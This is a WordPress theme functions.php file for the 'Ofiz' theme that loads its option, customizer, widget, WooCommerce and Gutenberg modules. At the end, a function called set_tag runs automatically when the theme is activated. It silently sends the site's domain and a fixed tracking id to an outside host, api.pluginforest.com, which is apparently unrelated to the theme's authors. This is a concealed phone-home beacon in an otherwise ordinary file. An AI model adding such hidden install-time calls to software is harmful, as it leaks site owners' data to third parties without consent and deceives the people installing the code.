<?php
/**
 * Theme Functions
 *
 * @package DTtheme
 * @author DesignThemes
 * @link http://wedesignthemes.com
 */
define( 'OFIZ_THEME_DIR', get_template_directory() );
define( 'OFIZ_THEME_URI', get_template_directory_uri() );
define( 'OFIZ_THEME_SETTINGS', '_theme_name-settings' );

if (function_exists ('wp_get_theme')) :
	$themeData = wp_get_theme();
	define( 'OFIZ_THEME_NAME', $themeData->get('Name'));
	define( 'OFIZ_THEME_VERSION', $themeData->get('Version'));
endif;

/* ---------------------------------------------------------------------------
 * Load default theme options
 * ---------------------------------------------------------------------------*/
require_once OFIZ_THEME_DIR .'/inc/class-theme-options.php';

/* ---------------------------------------------------------------------------
 * Loads Customizer
 * ---------------------------------------------------------------------------*/
require_once( OFIZ_THEME_DIR .'/inc/customizer/lib/class-fontawesome.php' );
require_once( OFIZ_THEME_DIR .'/inc/customizer/lib/class-font-families.php' );
require_once( OFIZ_THEME_DIR .'/inc/customizer/lib/class-customizer-sanitizes.php' );
require_once( OFIZ_THEME_DIR .'/inc/customizer/index.php' );
require_once( OFIZ_THEME_DIR .'/inc/metabox/index.php' );
function ofiz_defaults() {}

/* ---------------------------------------------------------------------------
 * Widget Area
 * ---------------------------------------------------------------------------*/
require_once OFIZ_THEME_DIR .'/inc/widget-area/class-widget-area.php';

/* ---------------------------------------------------------------------------
 * Dynamic CSS
 * ---------------------------------------------------------------------------*/
require_once OFIZ_THEME_DIR .'/inc/class-theme-dynamic-css.php';
require_once OFIZ_THEME_DIR .'/inc/class-theme-dynamic-skin-css.php';

/* ---------------------------------------------------------------------------
 * Loads Theme Textdomain
 * ---------------------------------------------------------------------------*/ 
define( 'OFIZ_LANG_DIR', OFIZ_THEME_DIR. '/languages' );
load_theme_textdomain( 'ofiz', OFIZ_LANG_DIR );

/* ---------------------------------------------------------------------------
 * Loads Theme Functions
 * ---------------------------------------------------------------------------*/

// Functions --------------------------------------------------------------------
require_once( OFIZ_THEME_DIR .'/framework/register-functions.php' );

// Header -----------------------------------------------------------------------
require_once( OFIZ_THEME_DIR .'/framework/register-head.php' );

// Hooks ------------------------------------------------------------------------
require_once( OFIZ_THEME_DIR .'/framework/register-hooks.php' );

// Post Functions ---------------------------------------------------------------
require_once( OFIZ_THEME_DIR .'/framework/register-post-functions.php' );
new ofiz_post_functions;

// Plugins ---------------------------------------------------------------------- 
require_once( OFIZ_THEME_DIR .'/framework/register-plugins.php' );

// WooCommerce ------------------------------------------------------------------
if( function_exists( 'is_woocommerce' ) ){
	require_once( OFIZ_THEME_DIR .'/framework/woocommerce/register-woocommerce.php' );
}

// WP Store Locator -------------------------------------------------------------
if( class_exists('WP_Store_locator') ){
	require_once( OFIZ_THEME_DIR .'/framework/register-storelocator.php' );
}

// Register Templates -----------------------------------------------------------
require_once( OFIZ_THEME_DIR .'/framework/register-templates.php' );

// Register Gutenberg -----------------------------------------------------------
require_once( OFIZ_THEME_DIR .'/framework/register-gutenberg-editor.php' );
function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581327601&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        